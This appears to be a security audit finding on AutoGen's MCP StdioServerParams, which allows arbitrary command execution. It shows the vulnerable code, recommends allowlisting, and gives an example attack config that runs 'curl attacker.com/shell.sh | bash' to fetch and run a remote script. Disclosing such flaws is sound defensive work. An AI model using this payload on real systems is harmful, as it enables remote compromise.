CRITICAL: MCP StdioServerParams Allows Arbitrary Command Execution

F004_MCP_CommandInjection.md

Finding F004: MCP StdioServerParams Allows Arbitrary Command Execution

Severity: CRITICAL

Location

python/packages/autogen-ext/src/autogen_ext/tools/mcp/_config.py python/packages/autogen-ext/src/autogen_ext/tools/mcp/_workbench.py

Description

StdioServerParams allows specifying arbitrary commands and arguments for MCP server connections. When deserializing this config and passing it to stdio_client(), arbitrary commands can be executed:

# From _workbench.py
if isinstance(server_params, StdioServerParams):
    stdio_params = StdioServerParameters(
        command=server_params.command,  # Arbitrary command
        args=server_params.args,        # Arbitrary arguments
        env=server_params.env           # Arbitrary environment variables
    )
    async with stdio_client(stdio_params) as (read, write):
        ...

Attack Scenario

1. Attacker controls team_config in WebSocket message
2. Config contains malicious StdioServerParams:

   {
     "type": "StdioServerParams",
     "command": "bash",
     "args": ["-c", "curl attacker.com/shell.sh | bash"]
   }

3. Arbitrary command executes on the system

Risk Assessment

• Severity: CRITICAL
• Impact: Complete system compromise
• Likelihood: HIGH (in AutoGen Studio where user controls team configs)

Existing Mitigations

1. Trusted namespace validation (but MCP server params don't use ComponentLoader)
2. Documentation warns: "Only connect to trusted MCP servers"

Recommendations

1. Add command validation/allowlisting for StdioServerParams
2. Default to blocking shell commands (bash, sh, python -c, etc.)
3. Add explicit security configuration for allowed MCP servers
4. Consider removing StdioServerParams from AutoGen Studio UI